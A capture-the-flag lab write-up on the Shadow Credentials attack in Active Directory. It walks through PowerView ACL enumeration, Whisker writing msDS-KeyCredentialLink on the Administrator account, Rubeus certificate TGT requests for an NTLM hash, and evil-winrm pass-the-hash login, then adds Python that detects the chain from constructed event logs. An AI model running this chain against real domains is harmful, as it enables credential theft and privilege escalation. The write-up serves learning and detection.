Day 11
Active Directory Jingle Bells, Shadow Spells
Learning Objectives
Understanding Active Directory
Introduction to Windows Hello for Business
Prerequisites for exploiting GenericWrite privilege
How the Shadow Credentials attack works
How to exploit the vulnerability
Active Directory 101
Active Directory (AD) is a system mainly used by businesses in Windows environments. It's a centralised authentication system. The Domain Controller (DC) is at the heart of AD and typically manages data storage, authentication, and authorisation within a domain.
This room is straightforward, with all the commands and instructions given to us.
As instructed, we first execute the following commands in PowerShell as part of our enumeration.
cd C:\Users\hr\Desktop #moves to the folder containing all the exploitation tools.
powershell -ep bypass #will bypass the default policy for arbitrary PowerShell script execution.
. .\PowerView.ps1 #loads the PowerView script into the memory.
We then execute this command, which lists the ACEs where the hr user is the trustee, together with the object each one applies to and the rights granted. The ObjectDN that carries GenericWrite is the account we will target.
Find-InterestingDomainAcl -ResolveGuids | Where-Object { $_.IdentityReferenceName -eq "hr" } | Select-Object IdentityReferenceName, ObjectDN, ActiveDirectoryRights

We can now proceed with the exploit.
As instructed, we use the tool Whisker, a C# utility created by Elad Shamir. Using Whisker is straightforward: once we have a vulnerable user, we run the add command to simulate the enrollment of a malicious device, which updates the msDS-KeyCredentialLink attribute.
This task can be accomplished by running the following command:
.\Whisker.exe add /target:Administrator
In our case, we'll have to replace the /target parameter with the one from the enumeration step executed inside our VM.
The tool will conveniently provide the certificate necessary to authenticate the impersonation of the vulnerable user with a command ready to be launched using Rubeus.
Rubeus is a C# toolset developed by SpecterOps for direct Kerberos interaction and exploitation. We use it to request a TGT with the certificate Whisker produced and to retrieve the NTLM hash of the target account, which lets us perform a pass-the-hash attack.
The next command will be
.\Rubeus.exe asktgt <#COPY THIS PORTION FROM THE OUTPUT OF WHISKER#>
This will give us an NTLM hash, which we can use with Evil-WinRM, a tool for remotely managing Windows systems that abuses the Windows Remote Management (WinRM) protocol.
evil-winrm -i 'IP_MACHINE' -u 'USERNAME' -H 'NTLM_HASH'

This gives us remote access, and we can proceed with answering the questions.
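From the defender's side, this chain leaves two traces on the Domain Controller: the write to msDS-KeyCredentialLink (Security Event ID 5136, provided directory service change auditing is enabled and a SACL covers the object) and the certificate-based TGT request that follows (Event ID 4768 with PKINIT pre-authentication). The Python below is an added example, not part of the room or of Whisker/Rubeus; the event records, the allow-listed service account svc_devreg$ and the 30-minute correlation window are constructed assumptions.

```python
"""Flag Shadow Credentials activity in constructed Windows Security events."""
from datetime import datetime, timedelta

# Assumed allow-list of principals that legitimately write other accounts' key
# credentials (e.g. a device-registration service); the name is constructed.
ALLOWED_WRITERS = {"svc_devreg$"}

# Constructed Event ID 5136 records (directory service object modified).
EVENTS_5136 = [
    {"time": "2023-12-11T09:00:00", "SubjectUserName": "alice",  # self-enrolment: normal
     "ObjectDN": "CN=alice,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
    {"time": "2023-12-11T09:05:00", "SubjectUserName": "hr",  # hr writes another account's key
     "ObjectDN": "CN=Administrator,CN=Users,DC=corp,DC=local",
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": "Value Added"},
]
# Constructed Event ID 4768 record; PreAuthType 16 = PA-PK-AS-REQ (PKINIT).
EVENTS_4768 = [
    {"time": "2023-12-11T09:05:30", "TargetUserName": "Administrator", "PreAuthType": "16",
     "CertThumbprint": "<constructed-thumbprint>", "IpAddress": "10.10.14.5"},
]

def rdn_name(dn):
    """Value of the leading RDN of a distinguished name (CN=x,... -> x)."""
    return dn.split(",", 1)[0].split("=", 1)[1]

def find_shadow_credential_writes(events_5136, allowed=ALLOWED_WRITERS):
    """Writes to msDS-KeyCredentialLink by anyone but the account itself (or an
    allow-listed service); self-writes are ordinary Windows Hello enrolment."""
    hits = []
    for e in events_5136:
        if e["AttributeLDAPDisplayName"].lower() != "msds-keycredentiallink":
            continue
        writer, owner = e["SubjectUserName"], rdn_name(e["ObjectDN"])
        if writer.lower() != owner.lower() and writer not in allowed:
            hits.append((e["time"], writer, owner, e["OperationType"]))
    return hits

def correlate_pkinit(hits, events_4768, window=timedelta(minutes=30)):
    """Pair each suspicious write with a PKINIT TGT request for the same account
    inside the window: that certificate logon turns the write into a ticket."""
    alerts = []
    for t, writer, owner, _ in hits:
        t0 = datetime.fromisoformat(t)
        for k in events_4768:
            if (k["TargetUserName"].lower() == owner.lower() and k["PreAuthType"] == "16"
                    and t0 <= datetime.fromisoformat(k["time"]) <= t0 + window):
                alerts.append({"target": owner, "writer": writer,
                               "source_ip": k["IpAddress"], "cert_thumbprint": k["CertThumbprint"]})
    return alerts
```

Removing the GenericWrite ACE found by PowerView, or restricting who may write msDS-KeyCredentialLink, closes the path the room exploits; the correlation above is the alert you want while that cleanup is pending.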
What is the hash of the vulnerable user?
[REDACTED]
This can be found in the output of Rubeus.
What is the content of flag.txt on the Administrator Desktop?
[REDACTED]